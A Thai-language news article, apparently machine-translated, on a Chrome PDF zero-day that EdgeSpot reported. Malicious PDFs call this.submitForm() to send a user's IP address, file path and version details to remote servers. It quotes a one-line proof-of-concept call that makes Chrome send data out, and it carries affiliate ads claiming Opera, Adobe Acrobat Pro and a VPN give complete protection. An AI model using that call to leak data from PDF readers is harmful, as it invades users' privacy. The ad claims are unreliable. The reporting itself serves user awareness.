บั๊กของ Chrome ช่วยให้แฮกเกอร์รวบรวมข้อมูลผู้ใช้ผ่านไฟล์ PDF ได้

บริการตรวจจับหาประโยชน์ EdgeSpot ค้นพบสิ่งที่น่าสนใจ โครเมียม ช่องโหว่ zero-day ที่ใช้ประโยชน์จากเอกสาร PDF

ช่องโหว่ทำให้ผู้โจมตีสามารถ เก็บเกี่ยวข้อมูลที่ละเอียดอ่อน โดยใช้เอกสาร PDF ที่เป็นอันตรายที่เปิดใน Chrome

ทันทีที่เหยื่อเปิดไฟล์ PDF ที่เกี่ยวข้องใน Google Chrome โปรแกรมที่เป็นอันตรายจะเริ่มทำงานในเบื้องหลังโดยการรวบรวมข้อมูลผู้ใช้

ข้อมูลจะถูกส่งต่อไปยังเซิร์ฟเวอร์ระยะไกลซึ่งถูกควบคุมโดยแฮกเกอร์ คุณอาจสงสัยว่าผู้โจมตีกำลังดูดข้อมูลใด พวกเขากำหนดเป้าหมายข้อมูลต่อไปนี้ในพีซีของคุณ:

• ที่อยู่ IP
• เส้นทางแบบเต็มของไฟล์ PDF บนระบบ
• เวอร์ชัน OS และ Chrome

ระวังไฟล์ PDF ที่แฝงมัลแวร์

ผู้เชี่ยวชาญ ด่าง ว่าหนึ่งในสองโดเมน readnotify[.]com หรือ burpcollaborator[.]net กำลังได้รับข้อมูล

พวกเขาเปิดเผยว่าผู้โจมตีกำลังใช้ this.submitForm() PDF Javascript API เพื่อรวบรวมข้อมูลที่สำคัญของผู้ใช้

เราทดสอบด้วย PoC ขั้นต่ำ การเรียก API แบบง่าย ๆ เช่น this.submitForm(' http://google.com/test’) จะทำให้ Google Chrome ส่งข้อมูลส่วนตัวไปที่ google.com

บั๊กของ Chrome นี้ถูกโจมตีโดยไฟล์ PDF ที่เป็นอันตรายสองชุดที่แตกต่างกัน โดยทั้งสองไฟล์เผยแพร่ในเดือนตุลาคม 2017 และกันยายน 2018 ตามลำดับ

ผู้โจมตีสามารถใช้ข้อมูลที่เก็บรวบรวมเพื่อปรับแต่งการโจมตีในอนาคต รายงานแนะนำว่าไฟล์ชุดแรกถูกคอมไพล์โดยใช้บริการติดตาม PDF ของ ReadNotify

ผู้ใช้สามารถใช้บริการเพื่อติดตามการดูของผู้ใช้ EdgeSpot ไม่ได้เปิดเผยรายละเอียดใดๆ เกี่ยวกับลักษณะของไฟล์ PDF ชุดที่สอง

เคล็ดลับง่ายๆ: เปลี่ยนเบราว์เซอร์ของคุณเป็น Opera

ในช่วงเวลาที่ยากลำบากเหล่านี้ เราถูกโจมตีด้วยมัลแวร์ ฟิชชิ่ง และโทรจันในทุกขั้นตอน ดังนั้น เราจึงต้องระมัดระวังตัวมากขึ้นและได้รับการปกป้อง

และเนื่องจากนี่เป็นปัญหาเฉพาะสำหรับ Chrome คุณจึงสามารถหลีกเลี่ยงภัยคุกคามนั้นและปัญหาอื่นๆ ทั้งหมดได้ด้วยเบราว์เซอร์ที่เน้นความปลอดภัย เช่น โอเปร่า.

เบราว์เซอร์นี้มาพร้อมกับตัวบล็อกโฆษณาในตัวที่ไม่เพียงแต่ล้างสิ่งรบกวน แต่ยังบล็อก สคริปต์การวิเคราะห์ พิกเซลการติดตาม และวิธีการรวบรวมข้อมูลของคุณ

และถ้าคุณต้องการแน่ใจว่าคุณอยู่ห่างจากภยันตรายใด ๆ ให้หลบเลี่ยงในตัว VPN บริการที่ใช้งานได้ฟรี 100% ไม่จำกัดเวลา

โอเปร่า

Opera เสนอการป้องกันภัยคุกคามที่สมบูรณ์แบบด้วยตัวบล็อกโฆษณาและบริการ VPN ฟรี!

รับฟรี
เข้าไปดูในเว็บไซต์

ฉันจะได้รับการปกป้องจากช่องโหว่ PDF ได้อย่างไร

ดาวน์โหลด Adobe Acrobat PRO

Adobe และ Chrome เข้ากันได้ดีกับการจัดการไฟล์ PDF ด้วยการติดตั้ง Adobe Extension สำหรับ Chrome คุณสามารถตรวจสอบและจัดการ PDF ตามที่คุณต้องการโดยไม่ต้องออกจากเบราว์เซอร์ที่คุณชื่นชอบ

แม้จะมีโครงสร้างที่แข็งแกร่ง แต่มัลแวร์ที่ซ่อนอยู่ในไฟล์ PDF อาจไม่ถูกตรวจพบหากคุณใช้ Reader เวอร์ชันมาตรฐาน

ขอแนะนำให้ใช้เวอร์ชันมืออาชีพเพื่อรับประกันการปกป้องของคุณและเก็บข้อมูลของคุณให้ห่างจากแฮกเกอร์

แม้ว่าจะไม่ฟรี แต่ราคาที่คุณจะจ่ายนั้นค่อนข้างเล็กสำหรับคุณสมบัติเพิ่มเติมมากมายที่คุณจะเพลิดเพลิน รวมถึงการรักษาความปลอดภัยขั้นสูงของไฟล์ PDF ของคุณ

นอกจากนี้ยังมีการทดลองใช้ฟรี 7 วันเพื่อให้คุณได้สัมผัสกับประสบการณ์ Pro เต็มรูปแบบก่อนตัดสินใจซื้อ

Adobe Acrobat PRO

อยู่ห่างจากมัลแวร์โดยการดาวน์โหลด Adobe Acrobat PRO มีคุณลักษณะมากมายมากกว่าเวอร์ชันฟรีและช่วยให้ข้อมูลของคุณปลอดภัย

ทดลองฟรี
เข้าไปดูในเว็บไซต์

---

ในกรณีที่คุณต้องการความปลอดภัยในขณะที่ท่องอินเทอร์เน็ต คุณจะต้องได้รับเครื่องมือที่ครบครันเพื่อรักษาความปลอดภัยเครือข่ายของคุณ ติดตั้งการเข้าถึงอินเทอร์เน็ตส่วนตัวทันที และปลอดภัยในตัวเอง ปกป้องพีซีของคุณจากการโจมตีขณะเรียกดู ปิดบังที่อยู่ IP ของคุณและบล็อกการเข้าถึงที่ไม่ต้องการทั้งหมด

---

บริการตรวจจับ Exploit EdgeSpot ต้องการเตือนผู้ใช้ Chrome เกี่ยวกับความเสี่ยงที่อาจเกิดขึ้น เนื่องจากโปรแกรมแก้ไขไม่คาดว่าจะออกในอนาคตอันใกล้นี้

EdgeSpot รายงานต่อ Google เกี่ยวกับช่องโหว่นี้ในปีที่แล้ว และบริษัทสัญญาว่าจะออกแพตช์ในปลายเดือนเมษายน

อย่างไรก็ตาม คุณสามารถลองใช้วิธีแก้ปัญหาชั่วคราวโดยดูเอกสาร PDF ที่ได้รับในเครื่องโดยใช้แอปตัวอ่านอื่น

อีกวิธีหนึ่ง คุณยังสามารถเปิดเอกสาร PDF ใน Chrome โดยยกเลิกการเชื่อมต่อระบบของคุณจากอินเทอร์เน็ต